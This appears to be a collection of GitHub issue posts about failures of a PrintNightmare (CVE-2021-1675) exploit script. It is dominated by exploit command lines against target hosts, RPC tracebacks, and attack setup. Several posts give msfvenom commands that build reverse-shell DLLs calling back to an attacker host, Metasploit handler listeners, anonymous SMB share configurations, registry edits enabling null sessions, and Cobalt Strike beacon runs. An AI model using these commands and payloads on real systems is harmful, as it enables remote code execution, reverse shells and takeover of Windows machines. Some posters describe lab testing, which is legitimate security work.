what problem did i have as described below when i ran the exploit.

_```
uring handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/tmp/CVE-2021-1675.py", line 176, in <module>
    main(dce, pDriverPath, options.share)
  File "/tmp/CVE-2021-1675.py", line 84, in main
    resp = rprn.hRpcAddPrinterDriverEx(dce, pName=handle, pDriverContainer=container_info, dwFileCopyFlags=flags)
  File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.9.egg/impacket/dcerpc/v5/rprn.py", line 633, in hRpcAddPrinterDriverEx
    return dce.request(request)
  File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.9.egg/impacket/dcerpc/v5/rpcrt.py", line 857, in request
    answer = self.recv()
  File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.9.egg/impacket/dcerpc/v5/rpcrt.py", line 1308, in recv
    response_data = self._transport.recv(forceRecv, count=MSRPCRespHeader._SIZE)
  File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.9.egg/impacket/dcerpc/v5/transport.py", line 547, in recv
    return self.__smb_connection.readFile(self.__tid, self.__handle)
  File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.9.egg/impacket/smbconnection.py", line 597, in readFile
    bytesRead = self._SMBConnection.read_andx(treeId, fileId, offset, toRead)
  File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.9.egg/impacket/smb3.py", line 1975, in read_andx
    return self.read(tid, fid, offset, max_size, wait_answer)
  File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.9.egg/impacket/smb3.py", line 1310, in read
    ans = self.recvSMB(packetID)
  File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.9.egg/impacket/smb3.py", line 454, in recvSMB
    data = self._NetBIOSSession.recv_packet(self._timeout)
  File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.9.egg/impacket/nmb.py", line 914, in recv_packet
    data = self.__read(timeout)
  File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.9.egg/impacket/nmb.py", line 1001, in __read
    data = self.read_function(4, timeout)
  File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.9.egg/impacket/nmb.py", line 985, in non_polling_read
    raise NetBIOSTimeout
impacket.nmb.NetBIOSTimeout: The NETBIOS connection with the remote host timed out._

Hope to get help from seniors. Thank you. <3 <3 <3
                                                                                    

Receiving this error when executing the script. The DLL is getting uploaded and is in the driver list, it exists at the filepath "C:\Windows\System32\spool\drivers\x64\3\MyDll.dll"
Output:
[] Connecting to ncacn_np:10.1.1.6[\PIPE\spoolss]
[+] Bind OK
[+] pDriverPath Found C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_83aa9aebf5dffc96\Amd64\UNIDRV.DLL
[] Executing \10.1.1.5\smb\MyDll.dll
[*] Stage0: 0
RPRN SessionError: code: 0x3 - ERROR_PATH_NOT_FOUND - The system cannot find the path specified.

Server is Windows server 2019 Essentials

Running remotely against a Windows 10 host.

Running the exploit successfully drops the malicious DLL in C:\Windows\System32\spool\drivers\x64\3. However, the "backup" process in the exploit write-up does not appear to be happening. C:\Windows\System32\spool\drivers\x64\3\old never appears to exist, resulting in RPRN SessionError: code: 0x3 - ERROR_PATH_NOT_FOUND - The system cannot find the path specified. errors when trying to execute the dll.

I have tried changing the pConfigFile to point at the .dll that I know exists:
container_info['DriverInfo']['Level2']['pConfigFile'] = "C:\\Windows\\System32\\spool\\drivers\\x64\\3\\{0}\x00".format(filename)

But this results in what I believe is expected from the original writeup:
RPRN SessionError: code: 0x20 - ERROR_SHARING_VIOLATION - The process cannot access the file because it is being used by another process.

The C# exp error:

Unhandled Exception: System.IO.FileNotFoundException: Could not load file or assembly 'System.Core, Version=4.0.0.0, Culture=neutral, Public
KeyToken=b77a5c561934e089' or one of its dependencies. The system cannot find the path specified.
at SharpPrintNightmare.Program.getDrivers(String computername)
at SharpPrintNightmare.Program.Main(String[] args)

Target Framework is set to 4.0

Connection Failed ,I print the error

$ python3 CVE-2021-1675.py test.com/administrator:[email protected] '\\10.211.55.15\share\re.dll'
[*] Try 1...
username:administrator password:MacBookPro111 domain:test.com lmhash: nthash: address:10.211.55.28 port:445
[*] Connecting to ncacn_np:10.211.55.28[\PIPE\spoolss]
[-] Connection Failed
SMB SessionError: STATUS_OBJECT_NAME_NOT_FOUND(The object name is not found.)

i try to use sharp PrintNightmare LPE with adduser.dll.

use visual studio to build to sharpprintnightmare.exe.

and use this C script to compile the adduser.dll - https://github.com/newsoft/adduser

i run this exploit on many windows version and nothing happen.

please your help. thanks

Hello.

I always receive this message: impacket.dcerpc.v5.rprn.DCERPCSessionError: RPRN SessionError: code: 0x525 - ERROR_NO_SUCH_USER - The specified account does not exist.

Has anyone had the same problem or know how I can solve it please?

Complete stdout:

"root@debianbraier:~/impacket/CVE-2021-1675# ./CVE-2021-1675.py dcbraier.teste/balves:[email protected] '\172.16.224.6\smb\fakeprinter.dll'
[] Connecting to ncacn_np:172.16.224.10[\PIPE\spoolss]
[+] Bind OK
[+] pDriverPath Found C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_83aa9aebf5dffc96\Amd64\UNIDRV.DLL
[] Executing \172.16.224.6\smb\fakeprinter.dll
[*] Try 1...
Traceback (most recent call last):
File "./CVE-2021-1675.py", line 176, in
main(dce, pDriverPath, options.share)
File "./CVE-2021-1675.py", line 84, in main
resp = rprn.hRpcAddPrinterDriverEx(dce, pName=handle, pDriverContainer=container_info, dwFileCopyFlags=flags)
File "/usr/local/lib/python3.7/dist-packages/impacket-0.9.24.dev1+20210630.100536.73b9466c-py3.7.egg/impacket/dcerpc/v5/rprn.py", line 633, in hRpcAddPrinterDriverEx
return dce.request(request)
File "/usr/local/lib/python3.7/dist-packages/impacket-0.9.24.dev1+20210630.100536.73b9466c-py3.7.egg/impacket/dcerpc/v5/rpcrt.py", line 878, in request
raise exception
impacket.dcerpc.v5.rprn.DCERPCSessionError: RPRN SessionError: code: 0x525 - ERROR_NO_SUCH_USER - The specified account does not exist."

User exist in the AD: "balves"

Target: WS 2019

Thanks

└─# python3 CVE-2021-1675.py domain.com/sird:[email protected] \192.168.189.131\smb\shell.dll
[*] Connecting to ncacn_np:192.168.189.128[\PIPE\spoolss]
[-] Connection Failed

Anyone how to fix this issues? i was not able to connect to my windows server 2019.

Hi cube0x0,
I am getting the below error.

What can be the problem?

Thanks!

Hi
I m run this ,
SharpPrintNightmare.exe '\DESKTOP-BVJA\Users\F1\Desktop\share\rev.dll' '\192.168.100.135' pr.local user 123@qwe
and result is :
[-] Failed to enumerate printer drivers

I did it on virtualized environment using the Poc you provided. However it always ends with "Stage0:0". Am I missing any step? When using process monitor I see my dll has been included but nothing happens. Thank you very much.

Traceback (most recent call last):
File "/home/kali/github/CVE-2021-1675/CVE-2021-1675.py", line 117, in
main(username, password, domain, lmhash, nthash, options.target_ip, options.port, options.share)
File "/home/kali/github/CVE-2021-1675/CVE-2021-1675.py", line 53, in main
resp = rprn.hRpcAddPrinterDriverEx(dce, pName=handle, pDriverContainer=container_info, dwFileCopyFlags=flags)
File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210629.125315.f43cf082-py3.9.egg/impacket/dcerpc/v5/rprn.py", line 614, in hRpcAddPrinterDriverEx
return dce.request(request)
File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210629.125315.f43cf082-py3.9.egg/impacket/dcerpc/v5/rpcrt.py", line 878, in request
raise exception
impacket.dcerpc.v5.rpcrt.DCERPCException: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied

I want to create a anonymous smb server at windows which in a domain, but it need domain administrator authentication.

if I create a anonymous smb server Outside the domain, I can't access the smb directory from my domain control server.

So how do I create an smb service that allows anonymous access without requiring domain administrator authentication ?

Hitting this error,

Target Server 2016 Datacenter

root@kali:~/Desktop/CVE-2021-1675# python3 CVE-2021-1675.py 'testdomain.local/username:P@[email protected]' '\\172.31.30.112\smb\printer22.dll'
[*] Try 1...
[*] Connecting to ncacn_np:172.31.35.104[\PIPE\spoolss]
[+] Bind OK
[*] Uploading \\172.31.30.112\smb\printer22.dll
Traceback (most recent call last):
  File "CVE-2021-1675.py", line 119, in <module>
    main(username, password, domain, lmhash, nthash, options.target_ip, options.port, options.share)
  File "CVE-2021-1675.py", line 55, in main
    resp = rprn.hRpcAddPrinterDriverEx(dce, pName=handle, pDriverContainer=container_info, dwFileCopyFlags=flags)
  File "/usr/local/lib/python3.8/dist-packages/impacket/dcerpc/v5/rprn.py", line 614, in hRpcAddPrinterDriverEx
    return dce.request(request)
  File "/usr/local/lib/python3.8/dist-packages/impacket/dcerpc/v5/rpcrt.py", line 878, in request
    raise exception
impacket.dcerpc.v5.rprn.DCERPCSessionError: RPRN SessionError: code: 0x3 - ERROR_PATH_NOT_FOUND - The system cannot find the path specified.

Hi!

I've tried to run this, but I dont know why it's giving me this error message. I used msfvenom to create my own dll with just the standard command.

Here is the full issue:

Any help at all would be appreciated! Thanks in advance.

sudo python3 CVE-2021-1675.py TEST/administrator:[email protected] '\192.168.121.128\smb\reverse.dll' 'C:\Windows\System32\spool\drivers\x64\3\UNIDRV.DLL'
[] Connecting to ncacn_np:192.168.121.164[\PIPE\spoolss]
[+] Bind OK
[+] pDriverPath Found C:\Windows\System32\spool\drivers\x64\3\UNIDRV.DLL
[] Executing \192.168.121.128\smb\reverse.dll
[*] Try 1...
Traceback (most recent call last):
File "/home/kali/CVE-2021-1675.py", line 176, in
main(dce, pDriverPath, options.share)
File "/home/kali/CVE-2021-1675.py", line 84, in main
resp = rprn.hRpcAddPrinterDriverEx(dce, pName=handle, pDriverContainer=container_info, dwFileCopyFlags=flags)
File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.9.egg/impacket/dcerpc/v5/rprn.py", line 633, in hRpcAddPrinterDriverEx
return dce.request(request)
File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.9.egg/impacket/dcerpc/v5/rpcrt.py", line 878, in request
raise exception
impacket.dcerpc.v5.rprn.DCERPCSessionError: RPRN SessionError: code: 0x20 - ERROR_SHARING_VIOLATION - The process cannot access the file because it is being used by another process.

C:\Users\test\Desktop>SharpPrintNightmare.exe '\\100.100.100.102\share\mimilib.dll' 'C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_7b3eed059f4c3e41\Amd64\UNIDRV.DLL' '\\100.100.100.100'
[*] Try 1...
[*] pDriverPath 'C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_7b3eed059f4c3e41\Amd64\UNIDRV.DLL'
[*] Executing '\\100.100.100.102\share\mimilib.dll'
[*] Stage 0: 1801
[*] Try 2...
[*] pDriverPath 'C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_7b3eed059f4c3e41\Amd64\UNIDRV.DLL'
[*] Executing '\\100.100.100.102\share\mimilib.dll'
[*] Stage 0: 1801
[*] Try 3...
[*] pDriverPath 'C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_7b3eed059f4c3e41\Amd64\UNIDRV.DLL'
[*] Executing '\\100.100.100.102\share\mimilib.dll'
[*] Stage 0: 1801

doesn't seem to work,wirkshark also did not catch the traffic

it seems to be working on members server and workstation only when UAC is off . ( rpc access denied on rpcaddprinterdriverex )
work as-in on a DC

any info about that ?

maybe something on rprn.APD_COPY_ALL_FILES | 0x10 | 0x8000 ?

The exploit fails, after a successful connection, bind, and dll upload with error ERROR_NO_SUCH_USER:

Hi,

I am trying to use the RCE version of the exploit on an unpatched test environment with no success. The LPE attack works.

Domain Controller:

Victim domain member:

This is the result:

python3 CVE-2021-1675.py 'LAB/attacker:Password@victim_IP' '\\file_server_IP\nightmare\nightmare.dll'
[*] Connecting to ncacn_np:192.168.0.200[\PIPE\spoolss]
[+] Bind OK
[+] pDriverPath Found C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_18b0d38ddfaee729\Amd64\UNIDRV.DLL
[*] Executing \??\UNC\192.168.0.102\nightmare\nightmare.dll
[*] Try 1...
Traceback (most recent call last):
  File "CVE-2021-1675.py", line 188, in <module>
    main(dce, pDriverPath, options.share)
  File "CVE-2021-1675.py", line 93, in main
    resp = rprn.hRpcAddPrinterDriverEx(dce, pName=handle, pDriverContainer=container_info, dwFileCopyFlags=flags)
  File "/usr/local/lib/python3.6/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.6.egg/impacket/dcerpc/v5/rprn.py", line 633, in hRpcAddPrinterDriverEx
    return dce.request(request)
  File "/usr/local/lib/python3.6/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.6.egg/impacket/dcerpc/v5/rpcrt.py", line 878, in request
    raise exception
impacket.dcerpc.v5.rpcrt.DCERPCException: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied

Any help is appriciated.

For the remote exploits, do you still need the same SMB configuration as you would with the Python script (either samba or the silly Windows share config)?

I have my share configured as mentioned in the python script readme, and I have tried running the remote as current context and remote runas against the DC using the path mentioned in the help menu and was getting Windows error code 1801. I also tried it against a generic share (not configured for null session, but Anonymous and Everyone have Read Access) and got the same 1801 error.

I switched the file to the one on the DC which has a slightly different path (amd64_7b3eed059f4c3e41) and was still getting windows error code 1801 on all attempts.

Cut from CobaltStrike

(same results in remote and runas)

Using the file path in the help menu

[*] Try 1...
[*] pDriverPath 'C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_83aa9aebf5dffc96\Amd64\UNIDRV.DLL'
[*] Executing '\172.16.190.156\share7\beacon2.dll'
[*] Stage 0: 1801
[*] Try 2...
[*] pDriverPath 'C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_83aa9aebf5dffc96\Amd64\UNIDRV.DLL'
[*] Executing '\172.16.190.156\share7\beacon2.dll'
[*] Stage 0: 1801
[*] Try 3...
[*] pDriverPath 'C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_83aa9aebf5dffc96\Amd64\UNIDRV.DLL'
[*] Executing '\172.16.190.156\share7\beacon2.dll'
[*] Stage 0: 1801

Using the file path from my DC

[*] Try 1...
[*] pDriverPath
'C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_7b3eed059f4c3e41\Amd64\UNIDRV.DLL'
[*] Executing '\172.16.190.156\share7\beacon2.dll'
[*] Stage 0: 1801
[*] Try 2...
[*] pDriverPath 'C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_7b3eed059f4c3e41\Amd64\UNIDRV.DLL'
[*] Executing '\172.16.190.156\share7\beacon2.dll'
[*] Stage 0: 1801`

sudo python3 CVE-2021-1675.py test.local/chen:[email protected] '\192.168.121.128\smb\reverse.dll'
[] Connecting to ncacn_np:192.168.121.165[\PIPE\spoolss]
[+] Bind OK
[+] pDriverPath Found C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_7b3eed059f4c3e41\Amd64\UNIDRV.DLL
[] Executing ??\UNC\192.168.121.128\smb\reverse.dll
[*] Try 1...
Traceback (most recent call last):
File "/home/kali/CVE-2021-1675.py", line 188, in
main(dce, pDriverPath, options.share)
File "/home/kali/CVE-2021-1675.py", line 93, in main
resp = rprn.hRpcAddPrinterDriverEx(dce, pName=handle, pDriverContainer=container_info, dwFileCopyFlags=flags)
File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.9.egg/impacket/dcerpc/v5/rprn.py", line 633, in hRpcAddPrinterDriverEx
return dce.request(request)
File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.9.egg/impacket/dcerpc/v5/rpcrt.py", line 878, in request
raise exception
impacket.dcerpc.v5.rprn.DCERPCSessionError: RPRN SessionError: code: 0x2 - ERROR_FILE_NOT_FOUND - The system cannot find the file specified.

$ python .\CVE-2021-1675.py ignite.local/techuser:[email protected] "\10.10.10.155\share\meter.dll"
[] Try 1...
[] Connecting to ncacn_np:10.10.10.156[\PIPE\spoolss]
[+] Bind OK
[+] pDriverPath Found C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_7b3eed059f4c3e41\Amd64\UNIDRV.DLL
[] Executing \10.10.10.155\share\meter.dll
[] Stage0: 0
[] Try 2...
[] Connecting to ncacn_np:10.10.10.156[\PIPE\spoolss]
[+] Bind OK
[+] pDriverPath Found C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_7b3eed059f4c3e41\Amd64\UNIDRV.DLL
[] Executing \10.10.10.155\share\meter.dll
[] Stage0: 0
[] Try 3...
[] Connecting to ncacn_np:10.10.10.156[\PIPE\spoolss]
[+] Bind OK
[+] pDriverPath Found C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_7b3eed059f4c3e41\Amd64\UNIDRV.DLL
[] Executing \10.10.10.155\share\meter.dll
[] Stage0: 0

Dll doesnt get executed

Hi team,

I installed impacket as instruction but I still have this issue:

└─$ sudo python CVE-2021-1675.py ntp.vn/tuan_nt:1235&*[email protected] '\10.10.14.39\smb\reverse.dll'
Traceback (most recent call last):
File "CVE-2021-1675.py", line 2, in
from impacket.dcerpc.v5 import rprn
ImportError: No module named impacket.dcerpc.v5

Help me please!

**i have this error

ERROR_PATH_NOT_FOUND - The system cannot find the path specified
More all OK**

all right smb without password, entering normally but always the folder error

Hi,

I started SMB sharing as anonymous with SMBv2 support. Any user can access the SMB share and it works correctly in the DLL but I keep getting the following error. Do you have any advice?

[*] Try 1...
[*] Connecting to ncacn_np:192.168.237.131[\PIPE\spoolss]
[+] Bind OK
[*] Uploading \\192.168.237.130\share\a.dll
Traceback (most recent call last):
  File "/opt/CVE-2021-1675/CVE-2021-1675.py", line 117, in <module>
    main(username, password, domain, lmhash, nthash, options.target_ip, options.port, options.share)
  File "/opt/CVE-2021-1675/CVE-2021-1675.py", line 53, in main
    resp = rprn.hRpcAddPrinterDriverEx(dce, pName=handle, pDriverContainer=container_info, dwFileCopyFlags=flags)
  File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210629.125315.f43cf082-py3.9.egg/impacket/dcerpc/v5/rprn.py", line 614, in hRpcAddPrinterDriverEx
    return dce.request(request)
  File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210629.125315.f43cf082-py3.9.egg/impacket/dcerpc/v5/rpcrt.py", line 878, in request
    raise exception
impacket.dcerpc.v5.rprn.DCERPCSessionError: RPRN SessionError: code: 0x57 - ERROR_INVALID_PARAMETER - The parameter is incorrect.```

Hi,

setup: Kali Linux (192.168.0.10)

msfvenom -a x64 -p windows/x64/shell_reverse_tcp LHOST=192.168.0.10 LPORT=4444 -f dll -o /tmp/rev.dll

/etc/samba/smb.conf                                                                                      
[global]
    map to guest = Bad User
    server role = standalone server
    usershare allow guests = yes
    idmap config * : backend = tdb
    smb ports = 445

[public]
    comment = Samba
    path = /tmp
    guest ok = yes
    read only = no
    browsable = yes
    force user = root

Share works, can open it from the Win10 System with \192.168.0.1\public
can see the rev.dll

# smbstatus                                                                                                    1 ⨯

Samba version 4.13.5-Debian
PID     Username     Group        Machine                                   Protocol Version  Encryption           Signing              
----------------------------------------------------------------------------------------------------------------------------------------
2839    nobody       nogroup      192.168.0.12 (ipv4:192.168.0.12:49924)    SMB3_11           -                    -                    

msfconsole
use exploit/multi/handler
set payload windows/x64/shell_reverse_tcp
set lhost 192.168.0.10
set lport 4444
run

# python3 CVE-2021-1675.py ./anna:[email protected] '\\192.168.0.10\\public\\rev.dll'
[*] Connecting to ncacn_np:192.168.0.12[\PIPE\spoolss]
[+] Bind OK
[-] Failed to enumerate remote pDriverPath
module 'impacket.dcerpc.v5.rprn' has no attribute 'hRpcEnumPrinterDrivers'

victim: Windows 10 21H1 (64bit) build 19043 (192.168.0.12) firewall is disabled

When try to copy the DLL to Desktop vor example:

But if I disable the VirusCheck the same error with the python script

How to fix it ?

Hi there,

I am getting the below error although I have the same version of impacket installed as yours. I even tried it on ubuntu machine, there too I'm getting the same error.

Getting this error when running exploit:

impacket.dcerpc.v5.rprn.DCERPCSessionError: RPRN SessionError: code: 0xc1 - ERROR_BAD_EXE_FORMAT - %1 is not a valid Win32 application.

I've tried both 32bit and 64bit DLLs via MSFVenom but get the same error for each.

I probably can use the ports 139 445. I can only use the ones above 1024, it works with port 56970 for creating the smb server but not for the exploit: CVE-2021-1675.py: error: argument -port: invalid choice: '56970' (choose from '139', '445')

what can i do?

hi, i tried to run the python script via windows cmd , and linux ubuntu 20 WSL both result in the same error

C:\Users\kolet\Downloads>python3 CVE-2021-1675.py hihi:[email protected] \\192.168.5.101\sft\re.dll [*] Connecting to ncacn_np:192.168.5.52[\PIPE\spoolss] [-] Connection Failed

i shared the re.dll with samba on linux , since it was in WSL i thought it did not work, so i just shared a folder with the re.dll inside and gave everyone permission to read/write into the folder and disable password requirement in the advanced sharing settings .

i made sure 192.168.5.52 could reach \192.168.5.101\sft\ manually (and it could.)

what am i doing wrong ?

thanks !

Connecting to ncacn_np:*****[\PIPE\spoolss]
[+] Bind OK
[+] pDriverPath Found C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_18b0d38ddfaee729\Amd64\UNIDRV.DLL
[] Executing ??\UNC***\share\reverse.dll
[] Try 1...
Traceback (most recent call last):
File "/home/kali/share/CVE-2021-1675-main/./CVE-2021-1675.py", line 188, in
main(dce, pDriverPath, options.share)
File "/home/kali/share/CVE-2021-1675-main/./CVE-2021-1675.py", line 93, in main
resp = rprn.hRpcAddPrinterDriverEx(dce, pName=handle, pDriverContainer=container_info, dwFileCopyFlags=flags)
File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.9.egg/impacket/dcerpc/v5/rprn.py", line 633, in hRpcAddPrinterDriverEx
return dce.request(request)
File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.9.egg/impacket/dcerpc/v5/rpcrt.py", line 878, in request
raise exception
impacket.dcerpc.v5.rprn.DCERPCSessionError: RPRN SessionError: unknown error code: 0x180

┌──(kali㉿kali)-[~/share/CVE-2021-1675-main]
└─$ impacket.dcerpc.v5.rprn.DCERPCSessionError: RPRN SessionError: unknown error code: 0x180 1 ⨯

mkdir C:\share
icacls C:\share\ /T /grant Anonymous` logon:r
icacls C:\share\ /T /grant Everyone:r
New-SmbShare -Path C:\share -Name share -ReadAccess 'ANONYMOUS LOGON','Everyone'
REG ADD "HKLM\System\CurrentControlSet\Services\LanManServer\Parameters" /v NullSessionPipes /t REG_MULTI_SZ /d srvsvc /f #This will overwrite existing NullSessionPipes
REG ADD "HKLM\System\CurrentControlSet\Services\LanManServer\Parameters" /v NullSessionShares /t REG_MULTI_SZ /d share /f
REG ADD "HKLM\System\CurrentControlSet\Control\Lsa" /v EveryoneIncludesAnonymous /t REG_DWORD /d 1 /f
REG ADD "HKLM\System\CurrentControlSet\Control\Lsa" /v RestrictAnonymous /t REG_DWORD /d 0 /f

Reboot

this is not working on windows 10 can you help me with this

Start SMB server with Impacket:
sudo examples/smbserver.py -smb2support -ts smb /xxx/PrintNightmare/smb

Run exploit:
python CVE-2021-1675.py -port 445 'xxx/xxx:xxx/@xxx' '\10.33.69.214\smb\nightmare.dll' 'C:\Windows\system32\spool\DRIVERS\x64\3\UNIDRV.DLL'

Exploit log:

[*] Connecting to ncacn_np:xxx[\PIPE\spoolss]
[+] Bind OK
[+] pDriverPath Found C:\Windows\system32\spool\DRIVERS\x64\3\UNIDRV.DLL
[*] Executing \\10.33.69.214\smb\nightmare.dll
[*] Try 1...
Traceback (most recent call last):
  File "xxx/CVE-2021-1675-cube0x0/CVE-2021-1675.py", line 176, in <module>
    main(dce, pDriverPath, options.share)
  File "xxx/CVE-2021-1675-cube0x0/CVE-2021-1675.py", line 84, in main
    resp = rprn.hRpcAddPrinterDriverEx(dce, pName=handle, pDriverContainer=container_info, dwFileCopyFlags=flags)
  File "xxx/CVE-2021-1675-cube0x0/venv/lib/python3.9/site-packages/impacket/dcerpc/v5/rprn.py", line 633, in hRpcAddPrinterDriverEx
    return dce.request(request)
  File "xxx/CVE-2021-1675-cube0x0/venv/lib/python3.9/site-packages/impacket/dcerpc/v5/rpcrt.py", line 878, in request
    raise exception
impacket.dcerpc.v5.rprn.DCERPCSessionError: RPRN SessionError: code: 0x20 - ERROR_SHARING_VIOLATION - The process cannot access the file because it is being used by another process.

SMB log:

[2021-07-05 12:31:44] [*] Disconnecting Share(1:smb)
[2021-07-05 12:31:44] [*] Closing down connection (10.33.48.25,58737)
[2021-07-05 12:31:44] [*] Remaining connections []
[2021-07-05 12:31:48] [*] Incoming connection (10.33.48.25,57754)
[2021-07-05 12:31:48] [*] AUTHENTICATE_MESSAGE (\,xxx)
[2021-07-05 12:31:48] [*] User xxx\ authenticated successfully
[2021-07-05 12:31:48] [*] :::00::aaaaaaaaaaaaaaaa
[2021-07-05 12:31:49] [*] Connecting Share(1:smb)

Wireshark screenshot:

Unimplemented dissector: SPOOLSS
Return code: Share mode on file conflict with open mode (0x00000020)

Is anyone familiar with this error?

this is full error
impacket.dcerpc.v5.rprn.DCERPCSessionError: RPRN SessionError: code: 0x45a - ERROR_DLL_INIT_FAILED - A dynamic link library (DLL) initialization routine failed.

i am trying this exploit on windows 10 . there is no dc can anyone help

I want to encrypt the dll payload how can i do it >>!?

uninstalled previous impacket installation and downloaded from git clone https://github.com/cube0x0/impacket

getting the below error: Any Idea ?

Currently the DLLis uploaded to the server but the spoolsv.exe is not loading it.
Anyone has a solution for this?

Getting an error

Traceback (most recent call last):
File "./rpcdump.py", line 23, in
from impacket.http import AUTH_NTLM
ImportError: No module named impacket.http

Followed install instructions exactly (kali). Google wasn't any help.

Hello,
in my lab environment I set a small private network with my Kali Linux (latest version), 192.168.145.128, with a samba share correctly configured, and a Windows 10 machine x64 (192.168.145.1) where I would like to inject the malicious dll (a classic shell reverse tcp), by:

msfvenom -f dll -p windows/x64/shell_reverse_tcp LHOST=192.168.145.128 LPORT=443 -o /tmp/reverse.dll

I can ping both of the machines on each side of them.
The PrintSpooler service is running on Windows and from Windows, the Linux smb share can be reached with no issues. Th Linux machine does not have ufw installed and iptables list is:

Chain INPUT (policy ACCEPT)
target     prot opt source               destination         

Chain FORWARD (policy ACCEPT)
target     prot opt source               destination         

Chain OUTPUT (policy ACCEPT)
target     prot opt source               destination   

Then, I start a listener on Kali machine by using Metasploit:

msf5 > use multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf5 exploit(multi/handler) > set PAYLOAD windows/x64/shell_reverse_tcp 
PAYLOAD => windows/x64/shell_reverse_tcp
msf5 exploit(multi/handler) > set LHOST 192.168.145.128
LHOST => 192.168.145.128
msf5 exploit(multi/handler) > set LPORT 443
LPORT => 443
msf5 exploit(multi/handler) > run

[*] Started reverse TCP handler on 192.168.145.128:443

When I execute the CVE-2021-1675 python script, the output is:

kali@kali:~$ sudo python3.8 CVE-2021-1675.py myusername:[email protected] '\\192.168.145.128\smb\reverse.dll'
[*] Connecting to ncacn_np:192.168.145.1[\PIPE\spoolss]
[+] Bind OK
[+] pDriverPath Found C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_c62e9f8067f98247\Amd64\UNIDRV.DLL
[*] Executing \\192.168.145.128\smb\reverse.dll
[*] Try 1...
[*] Stage0: 0
[*] Try 2...
[*] Stage0: 0
[*] Try 3...
[*] Stage0: 0

But on the listener nothing happens. I don't think the .dll is caught by the Windows Antivirus because I inserted it in exclusion.

What could be the issue? How can I solve?

Thank you

Hi, how to solve this problem?

What is the issue?

Here's my working smb share that can access anonymously.

Got this error

Hi,

I have followed the instructions (remove impacket and install) but the error happens:

There are some tip about how fix it?

Hello,

After investigating about this exploit, I've seen that the vulnerability CVE-2021-1675 was fully patched with the June 2021 security update. If this exploit is still working it is because it is exploiting the CVE-2021-34527. Can you confirm it, please?

Sources:
https://nakedsecurity.sophos.com/2021/07/07/printnightmare-official-patch-is-out-update-now/
https://nakedsecurity.sophos.com/2021/07/16/more-printnightmare-we-told-you-not-to-turn-the-print-spooler-back-on/
https://www.tenable.com/blog/cve-2021-34527-microsoft-releases-out-of-band-patch-for-printnightmare-vulnerability-in-windows

──(king㉿Kali)-[~/CVE-2021-1675]
└─$ sudo python3 CVE-2021-1675.py genyu.com/wxh:[email protected] '\192.168.175.132\smb\rever.dll'

[] Connecting to ncacn_np:192.168.175.133[\PIPE\spoolss]
[+] Bind OK
[+] pDriverPath Found C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_83aa9aebf5dffc96\Amd64\UNIDRV.DLL
[] Executing ??\UNC\192.168.175.132\smb\rever.dll
[] Try 1...
[] Stage0: 0
[*] Try 2...
Traceback (most recent call last):
File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.9.egg/impacket/smbconnection.py", line 568, in writeFile
return self._SMBConnection.writeFile(treeId, fileId, data, offset)
File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.9.egg/impacket/smb3.py", line 1650, in writeFile
written = self.write(treeId, fileId, writeData, writeOffset, len(writeData))
